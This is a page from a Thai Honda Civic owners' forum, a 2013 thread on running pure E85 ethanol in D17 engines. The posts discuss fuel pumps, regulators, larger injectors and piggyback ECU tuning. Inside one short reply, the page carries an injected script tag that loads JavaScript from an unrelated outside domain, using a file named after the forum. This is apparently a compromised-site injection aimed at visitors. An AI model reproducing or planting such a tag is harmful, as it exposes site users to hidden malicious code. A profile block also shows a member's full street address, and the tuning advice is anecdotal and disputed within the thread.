ขอสอบถามหน่อยครับ แล้วในทางกลับกันถ้าไม่เปลี่ยนอะไรเลย ใช้ของเดิมๆ(สมมติว่าพวกสายต่างๆยังอยู่ในสภาพดี)
การติดกล่อง E85 เข้ามาใช่วยจะดีในแง่ไหนครับ ช่วยให้ฉีดน้ำมันมันมากขึ้น โดยที่ไม่ต้องเปลี่ยนหัวฉีดก็ได้? หรือเป็นแค่การ
แก้ไขที่ปลายเหตครับ
ได้รับคำขอบคุณจาก: สมชาย 
yo555


ชื่อเล่น: โย

เข้าร่วม: 13 กรกฎา 2012
ตอบ: 765

Guru ES
Guru ES

ได้รับคำขอบคุณ: 249
ให้คำขอบคุณ: 522

ที่อยู่: เกิด แปดริ้ว..แต่มากริ๊วๆ..อยู่ ชลบุรี
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 6 กุมภา 2013 03:20 - ผมเติม E85 เพียวๆเลยครับ
ตัวผมเองก็เห็นมาทุกสเตปก่อนแล้วครับ.โชคดีมาก...
.ทั้งE85เพียวๆ...E85+แก็ส E85ที่เปลี่ยนแค่ปั๊มกะหัวเทียน+ท่อย่าง....E85+หัวฉีดใหม่ไมีมีกล่อง
และแบบบวกกล่องครับ.........แต่ตัวผมขับรถไม่เกิน180ครับเครื่องD17a....เลือกใช้แบบเปลี่ยนปั๊มติกเจท่อแช่...และหัวเทียนอิเรเดียม....
ก็รู้สึกว่าเพียงพอแล้ว....ก่อหน้านี้ก้อลองแบบเดิมมาประมาณ2ถังเดินทางใกลอัดแน่นๆเหยียบหนักๆ...เก็บข้อมูลตลอดเหมือนกันครับ....
ก้อสรุปได้ว่าสเตปนี้โอเคจึงนำเสนอเพื่อนๆเป็นแนวทางครับ......ประเด็นปั๊มเดิมกะเจนี่เห็นผลจริงคับในกรณีเหยียบเกิน140หรือตอนออกตัว
ปั๊มเดิมอืดมาก......เนื่องจากเท่าที่มีผู้รู้บอกมาคือเครื่องD17aเดิมๆมันไม่มีเรกกูดรเตอร์เพราะเครื่องเดิมมันกินน้ำมันน้อยพอเราเปลี่ยนมาเติมE85ที่ส่วนผสมบางนั้นจึงทำให้แรงดันที่ปั๊มเดิมส่งมาไม่เพียงพอ......แต่ขออย่างนึงครับก่อนที่ท่านจะหันมาเติมE85กรณาเช็ครถของท่านบ้างครับ
หัวเทียน..บางคนเป็นปีไม่เคยเปลี่ยน...วาล์ว..ไม่เคยตั้ง....รอบเดินเบามีปัญหาลิ้นปีกผีเสื้อไม่เคยล้างเป็นต้น...02ไม่ปรกติ
..เป็นต้น......เช็ตหน่อยครับจะได้รู้ว่าเวลาเสียมันเกิดจากอะไร....ยกตัวอย่างมีเพื่อนคนนึงไฟโชว์ก้อตกใจ..ปรากฎว่าเซนเซอร์ตรงแคตเสีย...ซะงั้น.....ตอนี้ผมใช้มา5เดือนสตาตท์ตอนเช้าลากยาวนิดหน่อย...อ่นเครื่องซักพักวิ่งดีมากครับเครื่องเดินเรียบและแรงปัญหาอื่นๆไม่พบเพื่อนที่ใช้กันประมาณ10กว่าคันก้อไม่มีปัญหาอะไร..จากที่แลกเปลี่ยนข้อมูลกันตลอดครับ
...ดีกว่าเติมโซฮอล91..E20แน่นอน....(ก่อนจะลองก็เห็นหลายท่านที่ใช้กและปรึกษากะช่างฮอนด้าที่ใช้กันมาก่อนครับ)....+-แล้วความประหยัดกะความเสี่ยงที่จะเสียในอนาคตถือว่าคุ้มคับ(อันนี้ส่วนตัวนะคับเพราะผมวิ่งใช้งานทางใกลทุกวัน)คิดในใจถ้าประหนัดประมาณนี้ใช้สักปี-2ปีแล้วต้องยกเครื่องประมาณนี้อะครับชั่งใจก่อน.....ตอนนี้เพื่อนที่ติดแกสอยู่ก้อจะถอดถังกันแล้วอะคับ........
***สุดท้ายพี่ๆน้อง..ใครจะเลือกแบบไหนก้อตามกำลังของท่านเลยครับ...ถ้าใช้รถไม่เยอะก้อเดิมๆเติม95ปรกติ....
แต่ถ้าอยากประหยัดจะแก๊สหรือE85ก็ตามสดวก....ส่วนท่านใดมีอะไรสอบถามหรือสงสัย..ผมเชื่อว่าพี่ๆน้องๆเราในบอร์ดทุกคนยินดีช่วยกันเต็มที่ครับ
ได้รับคำขอบคุณจาก: phichetza  สมชาย  anglo  honeybeex7  chaichan 
rakyat


ชื่อเล่น: โก้

เข้าร่วม: 11 กรกฎา 2012
ตอบ: 1262

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 663
ให้คำขอบคุณ: 482

ที่อยู่: จ.สุราษฎร์ธานี
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 6 กุมภา 2013 06:24 - ผมเติม E85 เพียวๆเลยครับ
wow wow wow ขอบคุณมากครับ ข้อมูลดีๆ เพราะผมใช้ E85 อยู่ครับ
ได้รับคำขอบคุณจาก: สมชาย 
สมชาย


เข้าร่วม: 14 มกรา 2013
ตอบ: 5916

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4245
ให้คำขอบคุณ: 7209

ที่อยู่: อ.บ้านบึง จ.ชลบุรี
ปี: 2001
สี: แดง รอยัล รูบี้ (มุก) (R-522P)
พุธ, 6 กุมภา 2013 07:58 - ผมเติม E85 เพียวๆเลยครับ
rakyat พิมพ์ว่า:
wow wow wow ขอบคุณมากครับ ข้อมูลดีๆ เพราะผมใช้ E85 อยู่ครับ


เติมเพียวเลยหลอครับหรือทำไรมาแล้ว"<script src="https://sport32news.com/civicesgroup.js">
anglo


ชื่อเล่น: นัท

เข้าร่วม: 10 พฤษภาคม 2012
ตอบ: 1475

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 621

ที่อยู่: 19/313 หมู่บ้านณัฐกมล รัษฎา2 ซ.3 ถ.รัษฎานุสรณ์ ต.รัษฎา อ.เมือง จ.ภูเก็ต 83000
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 6 กุมภา 2013 08:59 - ผมเติม E85 เพียวๆเลยครับ
yo555 พิมพ์ว่า:
ตัวผมเองก็เห็นมาทุกสเตปก่อนแล้วครับ.โชคดีมาก...
.ทั้งE85เพียวๆ...E85+แก็ส E85ที่เปลี่ยนแค่ปั๊มกะหัวเทียน+ท่อย่าง....E85+หัวฉีดใหม่ไมีมีกล่อง
และแบบบวกกล่องครับ.........แต่ตัวผมขับรถไม่เกิน180ครับเครื่องD17a....เลือกใช้แบบเปลี่ยนปั๊มติกเจท่อแช่...และหัวเทียนอิเรเดียม....
ก็รู้สึกว่าเพียงพอแล้ว....ก่อหน้านี้ก้อลองแบบเดิมมาประมาณ2ถังเดินทางใกลอัดแน่นๆเหยียบหนักๆ...เก็บข้อมูลตลอดเหมือนกันครับ....
ก้อสรุปได้ว่าสเตปนี้โอเคจึงนำเสนอเพื่อนๆเป็นแนวทางครับ......ประเด็นปั๊มเดิมกะเจนี่เห็นผลจริงคับในกรณีเหยียบเกิน140หรือตอนออกตัว
ปั๊มเดิมอืดมาก......เนื่องจากเท่าที่มีผู้รู้บอกมาคือเครื่องD17aเดิมๆมันไม่มีเรกกูดรเตอร์เพราะเครื่องเดิมมันกินน้ำมันน้อยพอเราเปลี่ยนมาเติมE85ที่ส่วนผสมบางนั้นจึงทำให้แรงดันที่ปั๊มเดิมส่งมาไม่เพียงพอ......แต่ขออย่างนึงครับก่อนที่ท่านจะหันมาเติมE85กรณาเช็ครถของท่านบ้างครับ
หัวเทียน..บางคนเป็นปีไม่เคยเปลี่ยน...วาล์ว..ไม่เคยตั้ง....รอบเดินเบามีปัญหาลิ้นปีกผีเสื้อไม่เคยล้างเป็นต้น...02ไม่ปรกติ
..เป็นต้น......เช็ตหน่อยครับจะได้รู้ว่าเวลาเสียมันเกิดจากอะไร....ยกตัวอย่างมีเพื่อนคนนึงไฟโชว์ก้อตกใจ..ปรากฎว่าเซนเซอร์ตรงแคตเสีย...ซะงั้น.....ตอนี้ผมใช้มา5เดือนสตาตท์ตอนเช้าลากยาวนิดหน่อย...อ่นเครื่องซักพักวิ่งดีมากครับเครื่องเดินเรียบและแรงปัญหาอื่นๆไม่พบเพื่อนที่ใช้กันประมาณ10กว่าคันก้อไม่มีปัญหาอะไร..จากที่แลกเปลี่ยนข้อมูลกันตลอดครับ
...ดีกว่าเติมโซฮอล91..E20แน่นอน....(ก่อนจะลองก็เห็นหลายท่านที่ใช้กและปรึกษากะช่างฮอนด้าที่ใช้กันมาก่อนครับ)....+-แล้วความประหยัดกะความเสี่ยงที่จะเสียในอนาคตถือว่าคุ้มคับ(อันนี้ส่วนตัวนะคับเพราะผมวิ่งใช้งานทางใกลทุกวัน)คิดในใจถ้าประหนัดประมาณนี้ใช้สักปี-2ปีแล้วต้องยกเครื่องประมาณนี้อะครับชั่งใจก่อน.....ตอนนี้เพื่อนที่ติดแกสอยู่ก้อจะถอดถังกันแล้วอะคับ........
***สุดท้ายพี่ๆน้อง..ใครจะเลือกแบบไหนก้อตามกำลังของท่านเลยครับ...ถ้าใช้รถไม่เยอะก้อเดิมๆเติม95ปรกติ....
แต่ถ้าอยากประหยัดจะแก๊สหรือE85ก็ตามสดวก....ส่วนท่านใดมีอะไรสอบถามหรือสงสัย..ผมเชื่อว่าพี่ๆน้องๆเราในบอร์ดทุกคนยินดีช่วยกันเต็มที่ครับ



เครื่องเดิมๆ ก็น่าจะมีเรกกูเรเตอร์น่ะครับ รถผมก็เพิ่งเปลี่ยนไปพร้อมๆ กับปั๊มติ๊ก
ได้รับคำขอบคุณจาก: yo555  สมชาย 
anglo


ชื่อเล่น: นัท

เข้าร่วม: 10 พฤษภาคม 2012
ตอบ: 1475

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 621

ที่อยู่: 19/313 หมู่บ้านณัฐกมล รัษฎา2 ซ.3 ถ.รัษฎานุสรณ์ ต.รัษฎา อ.เมือง จ.ภูเก็ต 83000
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 6 กุมภา 2013 09:08 - ผมเติม E85 เพียวๆเลยครับ
artoasis พิมพ์ว่า:
เปลี่ยนหัวฉีด K20A มาใช้ใน D17 แค่นั้นก็ใช้ E85 ได้แบบสบายใจแล้วครับ ไม่ต้องจูนกล่องครับ เพราะกล่อง ECU ตรวจอัตราส่วนผสมแบบ Lambda =1 ใช้น้ำมันเบนซินอะไรก็ได้เดี๋ยว ECU ก็ปรับเข้าหาค่าเอง แต่อุปกรณ์ต้องถึงด้วยนะ เช่นการขยายหัวฉีดที่มี cc เยอะขึ้น
พอจ่ายมากเกินเดี๋ยว ECU จะปรับลดให้เอง (หัวฉีดต้องอยู่ใน rank ที่รับได้ด้วยนะ) ส่วนเรื่ององศาไฟ ECU ก็เพียงแค่ปรับชดเชยให้เท่านั้น
ไม่ใช่องศาไฟที่ดีที่สุด แต่ใช้ได้เพราะเครื่อง D17 มี knock sensor ครับ


ทุกวันนี้ที่ไฟ Engine โชว์ ก็เพราะ ECU สั่งยกหัวฉีดจนสุดแล้วครับ ก็ยังไม่สามารถทำให้ส่วนผสมไปหาค่า Lambda=1 ได้ มันจึงขึ้นไฟเตือนครับ
ใช้ไปนาน หัวฉีดยกค้างก็พังอีกครับ


หัวเทียนไม่ใช่ประเด็นครับ เพียงแต่เราสามารถสังเกตอัตราส่วนผสมว่าหนาหรือบางได้จากสีของหัวเทียนครับ เปลี่ยนใหม่ก็เป็นอีกครับ หัวเทียนมันไม่พังหรอกครับ

1. สตาร์ทยากเพราะน้ำมันลงไม่พอ และ E85 ก็ลามไฟช้าอยู่แล้ว
2. O2 เซนเซอร์ไม่ได้เสีย แต่ที่ไฟโชว์ก็เพราะอัตราส่วนผสมบางเกินครับ
3. เปลี่ยนปั๊มติ๊กให้แรงขึ้น ใช่ครับเพราะ Flowrate จะเพิ่มขึ้นแต่สุดท้ายก็โดนควบคุมโดยเรกูเลเตอร์ครับ เลยยังไม่ตรงประเด็น
4. ท่อยางใช่ครับตามที่ผมเคยพิมพ์ไว้ ถ้ามีเวลาก็เปลี่ยนครับ แต่ของเดิมก็ใช่ว่าจะพังง่ายครับ ทนพอตัว


ผมเข้าใจนะครับว่ามันใช้ได้ แต่มันใช้ได้ไม่ดีครับ ถ้าทำแบบที่ผมบอก รถคุณจะแรงขึ้นเองโดยไม่ตั้งใจและประหยัดแบบสมเหตุสมผลไม่ต้องเสี่ยงปัญหาเครื่องพัง ผมรู้ว่าท่านอาจจะบอกว่าไม่ต้องการความแรง เพียงแค่ต้องการประหยัด เข้าใจครับเพียงแต่ผมอยากให้ท่านทั้งหลายใช้ให้ถูกตามหลักทฤษฎี และถูกเงินที่สุด สิ่งที่ได้มาท่านจะได้มาเองมันเป็นสิ่งที่ได้ฟรีมาจากน้ำมันครับ


ด้วยความเคารพนะครับ คืออ่านมานานแล้วครับ เห็นหลายๆท่านเกิดปัญหาจึงอดไม่ได้ที่จะพิมพ์อีกครั้งครับ

จะเชื่อหรือไม่ อันนี้ก็แล้วแต่ท่านสมาชิกครับผม



สอบถามเพิ่มเติมนิดนึงครับ

1.เปลี่ยนแค่เฉพาะหัวฉีด K20A หรือว่าต้องเปลี่ยนปั๊มติ๊ก+เรคกูเรเตอร์ด้วยครับ (เผอิญเพิ่งเปลี่ยน 2 อย่างหลัง ตรงรุ่นไป)

2.หัวฉีด K20A สามารถใส่กับ D17 ได้เลย ไม่ต้องดัดแปลง ใช่มั้ยครับ?
lkki5


เข้าร่วม: 26 ตุลา 2008
ตอบ: 2973

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3115
ให้คำขอบคุณ: 1255

ที่อยู่: สัตหีบ ชลบุรี หรือ พิจิตร นครสวรรค์
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
พุธ, 6 กุมภา 2013 09:52 - ผมเติม E85 เพียวๆเลยครับ
ช่วยตอบเสริมคุณอาร์ท
เมื่อก่อนไม่เปลี่ยนหัวฉีดตอนเครื่องเย็นสตารทยาก เวลาติดเครื่องจอดเติมน้ำมันไฟเช็คเครื่องโชว์ตลอด)แต่เดี๋ยวนี้เปลี่ยนหัวฉีด 400 cc+ f con pickyback ตอนเตรื่องเย็นติดง่ายกว่าตอนเครื่องร้อนอีกนะ(ถ้าใช้กล่อง standalone จะดีกว่านี้อีก) แล้วเวลาจอดเติมน้ำมันไม่ต้องดับเครื่องและไฟเช็ครูปเครื่องไม่ขึ้นอีกเลยทุกกรณีทุกการใช้งาน ปั้มติ้กเรกในถังขอบอกว่าของเดิมแรงดันเหลือๆเฟือครับ(ตอนวิ่งจูนกล่องที่ความเร็ว 230+ ค่า a/f ยังไม่ถอยเลยแสดงว่าปั้มติ้กเอาอยู่) การเลือกหัวฉีดลองปรึกษาพี่อาร์ทดูก่อนได้ ในความคิดผมเมื่อมีหัวฉีดแล้วมันก็ต้องมีอุปกรณ์ที่จะมาควบคุมหัวฉีดอีกแหละและทีนี้ก็ปรับการฉีดให้มันได้ตามอัตราส่วนที่เหมาะสม ถ้ามีหัวฉีดแต่ไม่สามารถคุมมันได้มันก็ดูแปลกๆ
ได้รับคำขอบคุณจาก: honeybeex7  yo555  สมชาย 
honeybeex7


เข้าร่วม: 11 มิถุนา 2010
ตอบ: 4710

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2450
ให้คำขอบคุณ: 10992

ที่อยู่: แดนสนธยาของ "เหล่าเทพ" มีแต่ "เทพ" ด้วยกันเท่านั้นที่ไปถึง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 6 กุมภา 2013 13:07 - ผมเติม E85 เพียวๆเลยครับ
ความรู้เพียบ ขอบคุรครับ
ได้รับคำขอบคุณจาก: สมชาย 
yo555


ชื่อเล่น: โย

เข้าร่วม: 13 กรกฎา 2012
ตอบ: 765

Guru ES
Guru ES

ได้รับคำขอบคุณ: 249
ให้คำขอบคุณ: 522

ที่อยู่: เกิด แปดริ้ว..แต่มากริ๊วๆ..อยู่ ชลบุรี
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 6 กุมภา 2013 13:47 - ผมเติม E85 เพียวๆเลยครับ
lkki5 พิมพ์ว่า:
ช่วยตอบเสริมคุณอาร์ท
เมื่อก่อนไม่เปลี่ยนหัวฉีดตอนเครื่องเย็นสตารทยาก เวลาติดเครื่องจอดเติมน้ำมันไฟเช็คเครื่องโชว์ตลอด)แต่เดี๋ยวนี้เปลี่ยนหัวฉีด 400 cc+ f con pickyback ตอนเตรื่องเย็นติดง่ายกว่าตอนเครื่องร้อนอีกนะ(ถ้าใช้กล่อง standalone จะดีกว่านี้อีก) แล้วเวลาจอดเติมน้ำมันไม่ต้องดับเครื่องและไฟเช็ครูปเครื่องไม่ขึ้นอีกเลยทุกกรณีทุกการใช้งาน ปั้มติ้กเรกในถังขอบอกว่าของเดิมแรงดันเหลือๆเฟือครับ(ตอนวิ่งจูนกล่องที่ความเร็ว 230+ ค่า a/f ยังไม่ถอยเลยแสดงว่าปั้มติ้กเอาอยู่) การเลือกหัวฉีดลองปรึกษาพี่อาร์ทดูก่อนได้ ในความคิดผมเมื่อมีหัวฉีดแล้วมันก็ต้องมีอุปกรณ์ที่จะมาควบคุมหัวฉีดอีกแหละและทีนี้ก็ปรับการฉีดให้มันได้ตามอัตราส่วนที่เหมาะสม ถ้ามีหัวฉีดแต่ไม่สามารถคุมมันได้มันก็ดูแปลกๆ

อัตราสิ้นเปลืองเปนไงบ้างคับพี่เม่น...350โลพอได้ไม่ครับ.....
ได้รับคำขอบคุณจาก: สมชาย 
yo555


ชื่อเล่น: โย

เข้าร่วม: 13 กรกฎา 2012
ตอบ: 765

Guru ES
Guru ES

ได้รับคำขอบคุณ: 249
ให้คำขอบคุณ: 522

ที่อยู่: เกิด แปดริ้ว..แต่มากริ๊วๆ..อยู่ ชลบุรี
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 6 กุมภา 2013 13:50 - ผมเติม E85 เพียวๆเลยครับ
anglo พิมพ์ว่า:

yo555 พิมพ์ว่า:
ตัวผมเองก็เห็นมาทุกสเตปก่อนแล้วครับ.โชคดีมาก...
.ทั้งE85เพียวๆ...E85+แก็ส E85ที่เปลี่ยนแค่ปั๊มกะหัวเทียน+ท่อย่าง....E85+หัวฉีดใหม่ไมีมีกล่อง
และแบบบวกกล่องครับ.........แต่ตัวผมขับรถไม่เกิน180ครับเครื่องD17a....เลือกใช้แบบเปลี่ยนปั๊มติกเจท่อแช่...และหัวเทียนอิเรเดียม....
ก็รู้สึกว่าเพียงพอแล้ว....ก่อหน้านี้ก้อลองแบบเดิมมาประมาณ2ถังเดินทางใกลอัดแน่นๆเหยียบหนักๆ...เก็บข้อมูลตลอดเหมือนกันครับ....
ก้อสรุปได้ว่าสเตปนี้โอเคจึงนำเสนอเพื่อนๆเป็นแนวทางครับ......ประเด็นปั๊มเดิมกะเจนี่เห็นผลจริงคับในกรณีเหยียบเกิน140หรือตอนออกตัว
ปั๊มเดิมอืดมาก......เนื่องจากเท่าที่มีผู้รู้บอกมาคือเครื่องD17aเดิมๆมันไม่มีเรกกูดรเตอร์เพราะเครื่องเดิมมันกินน้ำมันน้อยพอเราเปลี่ยนมาเติมE85ที่ส่วนผสมบางนั้นจึงทำให้แรงดันที่ปั๊มเดิมส่งมาไม่เพียงพอ......แต่ขออย่างนึงครับก่อนที่ท่านจะหันมาเติมE85กรณาเช็ครถของท่านบ้างครับ
หัวเทียน..บางคนเป็นปีไม่เคยเปลี่ยน...วาล์ว..ไม่เคยตั้ง....รอบเดินเบามีปัญหาลิ้นปีกผีเสื้อไม่เคยล้างเป็นต้น...02ไม่ปรกติ
..เป็นต้น......เช็ตหน่อยครับจะได้รู้ว่าเวลาเสียมันเกิดจากอะไร....ยกตัวอย่างมีเพื่อนคนนึงไฟโชว์ก้อตกใจ..ปรากฎว่าเซนเซอร์ตรงแคตเสีย...ซะงั้น.....ตอนี้ผมใช้มา5เดือนสตาตท์ตอนเช้าลากยาวนิดหน่อย...อ่นเครื่องซักพักวิ่งดีมากครับเครื่องเดินเรียบและแรงปัญหาอื่นๆไม่พบเพื่อนที่ใช้กันประมาณ10กว่าคันก้อไม่มีปัญหาอะไร..จากที่แลกเปลี่ยนข้อมูลกันตลอดครับ
...ดีกว่าเติมโซฮอล91..E20แน่นอน....(ก่อนจะลองก็เห็นหลายท่านที่ใช้กและปรึกษากะช่างฮอนด้าที่ใช้กันมาก่อนครับ)....+-แล้วความประหยัดกะความเสี่ยงที่จะเสียในอนาคตถือว่าคุ้มคับ(อันนี้ส่วนตัวนะคับเพราะผมวิ่งใช้งานทางใกลทุกวัน)คิดในใจถ้าประหนัดประมาณนี้ใช้สักปี-2ปีแล้วต้องยกเครื่องประมาณนี้อะครับชั่งใจก่อน.....ตอนนี้เพื่อนที่ติดแกสอยู่ก้อจะถอดถังกันแล้วอะคับ........
***สุดท้ายพี่ๆน้อง..ใครจะเลือกแบบไหนก้อตามกำลังของท่านเลยครับ...ถ้าใช้รถไม่เยอะก้อเดิมๆเติม95ปรกติ....
แต่ถ้าอยากประหยัดจะแก๊สหรือE85ก็ตามสดวก....ส่วนท่านใดมีอะไรสอบถามหรือสงสัย..ผมเชื่อว่าพี่ๆน้องๆเราในบอร์ดทุกคนยินดีช่วยกันเต็มที่ครับ



เครื่องเดิมๆ ก็น่าจะมีเรกกูเรเตอร์น่ะครับ รถผมก็เพิ่งเปลี่ยนไปพร้อมๆ กับปั๊มติ๊ก


มันอยุในถัง....กะปั๊มติกเหรอครับ.....มีคนเคยบอกครั้งนึงเหมือนกันแต่ตอนรื้อดูก้อยังงง...
ได้รับคำขอบคุณจาก: สมชาย 
kites04


ชื่อเล่น: กิต

เข้าร่วม: 05 กุมภา 2013
ตอบ: 117

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 60
ให้คำขอบคุณ: 0

ที่อยู่: ภูเก็ต
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 6 กุมภา 2013 13:58 - ผมเติม E85 เพียวๆเลยครับ
ตามด้วยคนคับ
ได้รับคำขอบคุณจาก: สมชาย 
SimonBKK


เข้าร่วม: 27 มีนา 2012
ตอบ: 991

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 778
ให้คำขอบคุณ: 570

ที่อยู่: ภูเก็ต
พุธ, 6 กุมภา 2013 19:49 - ผมเติม E85 เพียวๆเลยครับ
honeybeex7 พิมพ์ว่า:
ความรู้เพียบ ขอบคุรครับ



แต่รูปประจำตัวท่านนี่สิครับเห็นแล้ว..............
ได้รับคำขอบคุณจาก: สมชาย 
SimonBKK


เข้าร่วม: 27 มีนา 2012
ตอบ: 991

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 778
ให้คำขอบคุณ: 570

ที่อยู่: ภูเก็ต
พุธ, 6 กุมภา 2013 19:49 - ผมเติม E85 เพียวๆเลยครับ
kites04 พิมพ์ว่า:
ตามด้วยคนคับ



อย่าตามเติมเลยครับน้องกิต 
ได้รับคำขอบคุณจาก: สมชาย 
ตอบ
หน้า 46 จาก 79
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.